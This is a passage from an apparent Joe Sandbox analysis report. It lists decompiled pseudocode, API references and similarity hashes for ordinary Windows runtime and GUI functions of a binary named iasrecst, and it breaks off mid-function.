Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: File$AttributesSizeTimelstrcpyn
String ID:
API String ID: 1499663573-0
Opcode ID: dbecba43a928303c581e8da2cb8fd19ac9e6fcc8953e2d36976d88af1ab38ca6
Instruction ID: 4fe2cb551854f978d009958c1be7b26df4981621a34b5ca5644a38b106d1dacc
Opcode Fuzzy Hash: dbecba43a928303c581e8da2cb8fd19ac9e6fcc8953e2d36976d88af1ab38ca6
Instruction Fuzzy Hash: 2D318F76600605AFC721DFA0C885BEBB7B8FF24310F10496EE556D7290EB74A985CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406388, Relevance: 6.1, APIs: 4, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 83%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				unsigned int _t15;
				signed int _t27;
				signed int _t35;
				intOrPtr _t52;

				_t47 = __edi;
				_push(0xffffffff);
				_push(0x42f100);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_push(__edi);
				_v28 = _t52 - 0x58;
				_t15 = GetVersion();
				 *0x439d04 = 0;
				_t35 = _t15 & 0x000000ff;
				 *0x439d00 = _t35;
				 *0x439cfc = _t35 << 8;
				 *0x439cf8 = _t15 >> 0x10;
				if(E0040796F(1) == 0) {
					E004064B5(0x1c);
				}
				if(E00408DEC() == 0) {
					E004064B5(0x10);
				}
				_v8 = 0;
				E0040963B();
				 *0x43b87c = GetCommandLineA();
				 *0x439ce8 = E00409509();
				E004092BC();
				E00409203();
				E00406619();
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_v104 = E004091AB();
				_t56 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t27 = 0xa;
				} else {
					_t27 = _v96.wShowWindow & 0x0000ffff;
				}
				_v100 = E0040EC99(GetModuleHandleA(0), 0, _v104, _t27);
				E00406646(_t29);
				_t31 = _v24;
				_t40 =  *((intOrPtr*)( *_v24));
				_v108 =  *((intOrPtr*)( *_v24));
				return E00409033(_t47, _t56, _t40, _t31);
			}

APIs

GetVersion.KERNEL32 ref: 004063AE

Part of subcall function 0040796F: HeapCreate.KERNELBASE(00000000,00001000,00000000,004063E6,00000001), ref: 00407980
Part of subcall function 0040796F: HeapDestroy.KERNEL32 ref: 0040799E

GetCommandLineA.KERNEL32 ref: 0040640E
GetStartupInfoA.KERNEL32(?), ref: 00406439
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040645C

Part of subcall function 004064B5: ExitProcess.KERNEL32 ref: 004064D2

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
String ID:
API String ID: 2057626494-0
Opcode ID: 8203cef856ffdf5330fa23f021acb3231cccc4167ef851cc0875824ae4c609d5
Instruction ID: c51f859c3b4423f550283f3a037e6d2f417254e4b3c57e688e880ffcfc58db2c
Opcode Fuzzy Hash: 8203cef856ffdf5330fa23f021acb3231cccc4167ef851cc0875824ae4c609d5
Instruction Fuzzy Hash: 952174B1940715AAD718AFB6EC46A6D7BB8EF44704F10453FF902AA2D2DB7C4811CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00421DA3, Relevance: 6.1, APIs: 4, Instructions: 74
stringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00421DA3() {
				intOrPtr _t25;
				struct HWND__* _t26;
				struct HWND__* _t43;
				struct HWND__** _t50;
				void* _t52;

				E00406520(E0042A3D8, _t52);
				_t25 =  *0x436980; // 0x436994
				 *((intOrPtr*)(_t52 - 0x10)) = _t25;
				_t50 =  *(_t52 + 0xc);
				_t26 = _t50[2];
				_t43 = _t50[1];
				 *(_t52 - 4) = 0;
				if(_t26 != 0xfffffdf8 || (_t50[0x19] & 0x00000001) == 0) {
					if(_t26 == 0xfffffdee && (_t50[0x2d] & 0x00000001) != 0) {
						goto L4;
					}
				} else {
					L4:
					_t43 = GetDlgCtrlID(_t43) & 0x0000ffff;
				}
				if(_t43 == 0) {
					L8:
					_push(0x50);
					_push( *((intOrPtr*)(_t52 - 0x10)));
					_push( &(_t50[4]));
					if(_t50[2] != 0xfffffdf8) {
						E00416D78();
					} else {
						lstrcpynA();
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t52 + 0x10)))) = 0;
					SetWindowPos( *_t50, 0, 0, 0, 0, 0, 0x213);
					_push(1);
					_pop(0);
				} else {
					if(E00417298(_t43, _t52 - 0x110, 0x100) != 0) {
						E004172BF(_t52 - 0x10, _t52 - 0x110, 1, 0xa);
						goto L8;
					}
				}
				 *(_t52 - 4) =  *(_t52 - 4) | 0xffffffff;
				E00416AEC(_t52 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return 0;
			}

APIs

__EH_prolog.LIBCMT ref: 00421DA8
GetDlgCtrlID.USER32 ref: 00421DEC
lstrcpynA.KERNEL32(?,?,00000050), ref: 00421E31
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00421E52

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CtrlH_prologWindowlstrcpyn
String ID:
API String ID: 2888839504-0
Opcode ID: e883827794f995750d8e0748482c4f524e8e7c9e824d21524573c760b701934f
Instruction ID: 51cd8aa0e5dd28eac912709b930bb33ded5dc075b1ee3252d35fc9d3b9766125
Opcode Fuzzy Hash: e883827794f995750d8e0748482c4f524e8e7c9e824d21524573c760b701934f
Instruction Fuzzy Hash: D8219071600215ABCB30DB65DC85BABB7B8BF14314F44452EF952922E0D3B4A940CA14

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF2C, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040BF2C(void* __ecx) {
				int _t30;
				void* _t40;
				int _t42;
				short* _t44;
				int _t45;
				int _t48;
				void* _t49;
				short* _t51;

				_t40 = __ecx;
				_t51 =  *(_t49 - 0x18);
				 *(_t49 - 0x24) = 0;
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				_t45 =  *(_t49 + 0x14);
				_t42 = 1;
				if( *(_t49 - 0x24) == 0 || MultiByteToWideChar( *(_t49 + 0x20), _t42,  *(_t49 + 0x10), _t45,  *(_t49 - 0x24),  *(_t49 - 0x1c)) == 0) {
					L8:
					_t30 = 0;
				} else {
					_t48 = MultiByteToWideChar( *(_t49 + 0x20), 9,  *(_t49 + 0x18),  *(_t49 + 0x1c), 0, 0);
					 *(_t49 - 0x20) = _t48;
					if(_t48 == 0) {
						goto L8;
					} else {
						 *(_t49 - 4) = _t42;
						E00406830(_t48 + _t48 + 0x00000003 & 0x000000fc, _t40);
						 *(_t49 - 0x18) = _t51;
						_t44 = _t51;
						 *(_t49 - 0x28) = _t44;
						 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
						if(_t44 == 0 || MultiByteToWideChar( *(_t49 + 0x20), 1,  *(_t49 + 0x18),  *(_t49 + 0x1c), _t44, _t48) == 0) {
							goto L8;
						} else {
							_t30 = CompareStringW( *(_t49 + 8),  *(_t49 + 0xc),  *(_t49 - 0x24),  *(_t49 - 0x1c), _t44, _t48);
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0x10));
				return _t30;
			}

APIs

MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,0040A577), ref: 0040BF5B
MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,0040A577), ref: 0040BF6E
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,0040A577), ref: 0040BFBA
CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,0040A577), ref: 0040BFD2

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ByteCharMultiWide$CompareString
String ID:
API String ID: 376665442-0
Opcode ID: 457da201d333a445e7be22f73c5e8df3eb2b5babfed425308593c8da7e39ea65
Instruction ID: 5efc645efc17fcc534c18c6f6ed6037a474d66dfe24f988aec16bcf1503d57bf
Opcode Fuzzy Hash: 457da201d333a445e7be22f73c5e8df3eb2b5babfed425308593c8da7e39ea65
Instruction Fuzzy Hash: 3621FA3290021AEBCF218F84CD459DE7FB6FB48750F10416AFA11B21A0C3359962DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041837E, Relevance: 6.1, APIs: 4, Instructions: 66
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041837E(intOrPtr _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				int _t36;
				void* _t50;

				_t47 = _a4;
				_v28.wYear =  *((intOrPtr*)(E00410A6D(_a4, 0, 0) + 0x14)) + 0x76c;
				_v28.wMonth =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 0x10)) + 1;
				_v28.wDay =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 0xc));
				_v28.wHour =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 8));
				_v28.wMinute =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 4));
				_t30 = E00410A6D(_t47, 0, 0);
				_v28.wMilliseconds = 0;
				_v28.wSecond =  *_t30;
				if(SystemTimeToFileTime( &_v28,  &_v12) == 0) {
					E00417D15(_t50, GetLastError(), 0);
				}
				_t36 = LocalFileTimeToFileTime( &_v12, _a8);
				if(_t36 == 0) {
					return E00417D15(_t50, GetLastError(), 0);
				}
				return _t36;
			}

0x00418386
0x0041839e
0x004183ae
0x004183be
0x004183ce
0x004183de
0x004183e2
0x004183ea
0x004183ee
0x00418408
0x0041840e
0x0041840e
0x0041841a
0x00418422
0x00000000
0x00418428
0x00418430

APIs

SystemTimeToFileTime.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004183FA
GetLastError.KERNEL32(00000000), ref: 0041840B
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041841A
GetLastError.KERNEL32(00000000), ref: 00418425

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Time$File$ErrorLast$LocalSystem
String ID:
API String ID: 1172841412-0
Opcode ID: 77e8b690d52222c06148fd2690c6150cb9e48df62c9af10ae8d967d673f72f3a
Instruction ID: 69ffd75d0e39b7352c5362a2be2b2db12d62653dc9023d602915fa8a64db73ca
Opcode Fuzzy Hash: 77e8b690d52222c06148fd2690c6150cb9e48df62c9af10ae8d967d673f72f3a
Instruction Fuzzy Hash: 2F11542AA10319A6CF00BBE698059EFB7BDEF94744B04405BF51197222EB78D6C187ED

Uniqueness

Uniqueness Score: -1.00%

Function 00427D03, Relevance: 6.1, APIs: 4, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00427D03(void* __ecx) {
				CHAR* _t35;
				void* _t40;
				CHAR* _t49;
				CHAR* _t55;
				signed int _t56;
				void* _t61;

				E00406520(E0042A190, _t61);
				_t49 =  *(_t61 + 8);
				_t55 =  *(_t61 + 0xc);
				 *(_t61 + 0xc) =  &(_t49[_t55 - 1]);
				 *((intOrPtr*)(_t61 - 0x10)) =  *((intOrPtr*)(E004126FB() + 0x1c));
				_t56 = 0 | _t55 != 0x00000001;
				_t35 =  *0x436980; // 0x436994
				 *(_t61 + 8) = _t35;
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				if(E004172BF(_t61 + 8,  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x114)) + 0x1c)), _t56, 0xa) != 0) {
					if(_t56 != 0) {
						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49,  *(_t61 + 0xc));
					} else {
						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49);
					}
					SendMessageA( *( *((intOrPtr*)(_t61 - 0x10)) + 0x1c), 0x362, 0, _t61 - 0x60);
				}
				 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
				_t40 = E00416AEC(_t61 + 8);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t40;
			}

APIs

__EH_prolog.LIBCMT ref: 00427D08

Part of subcall function 004172BF: lstrlenA.KERNEL32(?), ref: 00417303

wsprintfA.USER32 ref: 00427D69
wsprintfA.USER32 ref: 00427D7F
SendMessageA.USER32 ref: 00427D99

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: wsprintf$H_prologMessageSendlstrlen
String ID:
API String ID: 443212507-0
Opcode ID: 7f582531f965cc17da0ee5c9b4071f69e8f9433dc37d9febc509c367a3985e73
Instruction ID: 7ff1a3cc2775f07db174e29478699fd29c516c00f85defca4782343cc9fd23cc
Opcode Fuzzy Hash: 7f582531f965cc17da0ee5c9b4071f69e8f9433dc37d9febc509c367a3985e73
Instruction Fuzzy Hash: 75214D76A00208ABCB11DFA8DC85ADEB7B9FF08354F018126F919DB251E734DA15CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041F9E4, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041F9E4(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _t21;
				intOrPtr _t32;
				int _t36;
				void* _t46;

				_push(__ecx);
				_push(__ecx);
				_t46 = __ecx;
				_t36 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_v8 = _t21;
				OffsetRect(__ecx + 0x28, _t36, _t21);
				OffsetRect(_t46 + 0x48, _t36, _v8);
				OffsetRect(_t46 + 0x38, _t36, _v8);
				OffsetRect(_t46 + 0x58, _t36, _v8);
				_t48 =  *((intOrPtr*)(_t46 + 0x80));
				 *((intOrPtr*)(_t46 + 4)) = _a4;
				 *((intOrPtr*)(_t46 + 8)) = _a8;
				if( *((intOrPtr*)(_t46 + 0x80)) == 0) {
					_t32 = E004201E2();
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t46 + 0x74)) = _t32;
				return E0042007A(_t46, _t48, 0);
			}

APIs

OffsetRect.USER32(?,?,?), ref: 0041FA0D
OffsetRect.USER32(?,?,?), ref: 0041FA17
OffsetRect.USER32(?,?,?), ref: 0041FA21
OffsetRect.USER32(?,?,?), ref: 0041FA2B

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: 724412e346da52ef1abd13ebb36a31384d97fecc05aac676bbc0405bf4fe35f7
Instruction ID: 12d90742d37334e6a7f33d2c848e5a22a1ecdf716f2821100b5f1ee929164941
Opcode Fuzzy Hash: 724412e346da52ef1abd13ebb36a31384d97fecc05aac676bbc0405bf4fe35f7
Instruction Fuzzy Hash: 3C113C71600609AFDB20DFAAC984D9BBBECEF44344B00482EF54AC3650D674EE408B60

Uniqueness

Uniqueness Score: -1.00%

Function 00422C42, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00422C42(void* __ecx) {
				void* __ebp;
				void* _t6;
				void* _t8;
				void* _t27;
				void* _t30;
				void* _t32;

				_t32 = __ecx;
				_t6 = E004136A7(__ecx);
				if(_t6 != 0) {
					if((E00416528(_t32) & 0x00000001) != 0) {
						_t27 = E00414CEF(_t32);
						_t30 = E00413740(_t32, GetForegroundWindow());
						if(_t27 == _t30 || E00413740(_t32, GetLastActivePopup( *(_t27 + 0x1c))) == _t30 && SendMessageA( *(_t30 + 0x1c), 0x36d, 0x40, 0) != 0) {
							_push(1);
							_pop(0);
						}
						asm("sbb eax, eax");
						SendMessageA( *(_t32 + 0x1c), 0x36d, 0xb4, 0);
					}
					_t8 = 1;
					return _t8;
				}
				return _t6;
			}

0x00422c43
0x00422c45
0x00422c4c
0x00422c58
0x00422c64
0x00422c78
0x00422c7c
0x00422ca7
0x00422ca9
0x00422ca9
0x00422cac
0x00422cbe
0x00422cc2
0x00422cc5
0x00000000
0x00422cc5
0x00422cc7

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetForegroundWindow.USER32 ref: 00422C66
GetLastActivePopup.USER32(?), ref: 00422C81
SendMessageA.USER32 ref: 00422C9D
SendMessageA.USER32 ref: 00422CBE

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MessageSendWindow$ActiveForegroundLastLongPopup
String ID:
API String ID: 2039223353-0
Opcode ID: 045ec56b260f3de9eff23e93b67e4b6a915aff67d248da42b0d3d9ef37d763b1
Instruction ID: 235acb9714286046b2b697988b516babaf9458fdd3923160d87edcd70ef93c92
Opcode Fuzzy Hash: 045ec56b260f3de9eff23e93b67e4b6a915aff67d248da42b0d3d9ef37d763b1
Instruction Fuzzy Hash: 2301F2723403153EEB212A73FD51FAE6209AB40B55F50083ABA01DA2D1DAADDD86416C

Uniqueness

Uniqueness Score: -1.00%

Function 00417748, Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00417748(void* __ecx, void* __esi) {
				void* _v8;
				void* __ebp;
				void* _t10;
				void* _t22;
				intOrPtr* _t29;
				void* _t31;
				void* _t34;

				_t31 = __esi;
				_push(__ecx);
				_t22 = __ecx;
				if(E004131DD(0x10) == 0) {
					_t29 = 0;
				} else {
					_t29 = E004176E1(_t8, 0xffffffff);
				}
				_push(_t31);
				_t10 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t22 + 4), _t10,  &_v8, 0, 0, 2) == 0) {
					if(_t29 != 0) {
						 *((intOrPtr*)( *_t29 + 4))(1);
					}
					E00417D15(_t34, GetLastError(), 0);
				}
				 *((intOrPtr*)(_t29 + 4)) = _v8;
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t22 + 8));
				return _t29;
			}

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 0041777C
GetCurrentProcess.KERNEL32(?,00000000), ref: 00417782
DuplicateHandle.KERNEL32(00000000), ref: 00417785
GetLastError.KERNEL32(00000000), ref: 0041779F

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast
String ID:
API String ID: 3907606552-0
Opcode ID: 487aebb410ded9b0ec04d8d8fea2586699d6c29f13a4c79ccff8f06708e505eb
Instruction ID: 78f57001bf266bd8873ef29effcb20f5a2db12ccf0cf7036e4147b7dfe15a156
Opcode Fuzzy Hash: 487aebb410ded9b0ec04d8d8fea2586699d6c29f13a4c79ccff8f06708e505eb
Instruction Fuzzy Hash: CC018435704304BBEB10ABA9DC49FAA7BB8DF44760F244526F915CB2D1DB64EC8087A4

Uniqueness

Uniqueness Score: -1.00%

Function 00410C4F, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00410C4F(void* __ecx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t18;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t24;

				_t8 = _a8;
				_v12.x = _t8->x;
				_t18 = _t8->y;
				_push(_t18);
				_v12.y = _t18;
				_t9 = WindowFromPoint( *_t8);
				_t24 = _t9;
				if(_t24 != 0) {
					_t21 = GetParent(_t24);
					if(_t21 == 0 || E0041A759(_t21, 2) == 0) {
						ScreenToClient(_t24,  &_v12);
						_t22 = E0041A7CE(_t24, _v12.x, _v12.y);
						if(_t22 == 0) {
							L6:
							_t9 = _t24;
						} else {
							_t14 = IsWindowEnabled(_t22);
							_t9 = _t22;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t21;
					}
				}
				return _t9;
			}

APIs

WindowFromPoint.USER32(?,?), ref: 00410C67
GetParent.USER32(00000000), ref: 00410C74
ScreenToClient.USER32 ref: 00410C95
IsWindowEnabled.USER32(00000000), ref: 00410CAE

Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$ClientEnabledFromLongParentPointScreen
String ID:
API String ID: 2204725058-0
Opcode ID: 1e2d37df1472de887ddde9cf9ac6649944d58a441de37f59d3653998fea7e7e4
Instruction ID: b03e2d05c99e3754afe2f9c82b4a20bfc763fe38c38db5da76ce186bf725b679
Opcode Fuzzy Hash: 1e2d37df1472de887ddde9cf9ac6649944d58a441de37f59d3653998fea7e7e4
Instruction Fuzzy Hash: 8D01D436600614BF87169B989C44DEF7BB9EF85740B140129F905D7310EB78DD818BEC

Uniqueness

Uniqueness Score: -1.00%

Function 00426CBA, Relevance: 6.0, APIs: 4, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00426CBA(intOrPtr __ecx, void* __eflags) {
				void* _t21;
				intOrPtr* _t32;
				struct HICON__** _t40;
				intOrPtr _t43;
				void* _t45;

				E00406520(E0042A113, _t45);
				_push(__ecx);
				_t43 = __ecx;
				 *((intOrPtr*)(_t45 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x42c9fc;
				 *(_t45 - 4) = 1;
				E00419BEE(__ecx + 0x78);
				_t39 =  *((intOrPtr*)(_t43 + 0x114));
				if( *((intOrPtr*)(_t43 + 0x114)) != 0) {
					E004288AC(_t39);
					E00413206(_t39);
				}
				E00413206( *((intOrPtr*)(_t43 + 0x88)));
				_t32 =  *((intOrPtr*)(_t43 + 0x74));
				if(_t32 != 0) {
					 *((intOrPtr*)( *_t32 + 4))(1);
				}
				_t40 = _t43 + 0x100;
				if( *(_t43 + 0x100) != 0) {
					SetCursor(LoadCursorA(0, 0x7f00));
					DestroyCursor( *_t40);
				}
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				E00419C1F(_t43 + 0x78);
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				_t21 = E0041AD27(_t43);
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t21;
			}

APIs

__EH_prolog.LIBCMT ref: 00426CBF
LoadCursorA.USER32 ref: 00426D29
SetCursor.USER32(00000000), ref: 00426D30
DestroyCursor.USER32(00000000), ref: 00426D38

Part of subcall function 004288AC: __EH_prolog.LIBCMT ref: 004288B1
Part of subcall function 004288AC: DeleteDC.GDI32(?), ref: 004288D2

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Cursor$H_prolog$DeleteDestroyLoad
String ID:
API String ID: 2398634004-0
Opcode ID: 11ff31ac3701bcf7089a1abddc17fb2184ff4a9a02ad15d7e71b413ad67de2bd
Instruction ID: 779aaf76a531418baa36e2a5a867f58700d8f9a93bf22c0d14db93a2c62a59f0
Opcode Fuzzy Hash: 11ff31ac3701bcf7089a1abddc17fb2184ff4a9a02ad15d7e71b413ad67de2bd
Instruction Fuzzy Hash: A511E031300600DBE735AF65E806BEEBBA5EF44714F50012FE16697291CBB82981CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00414E0D, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00414E0D(struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				void* _t12;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t16 = GetDlgItem(_a4, _a8);
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						if(_t17 == 0) {
							break;
						}
						_t12 = E00414E0D(_t17, _a8, _a12);
						if(_t12 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L11;
					}
					return 0;
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E00413740(_t18);
						}
						_t12 = E00413767();
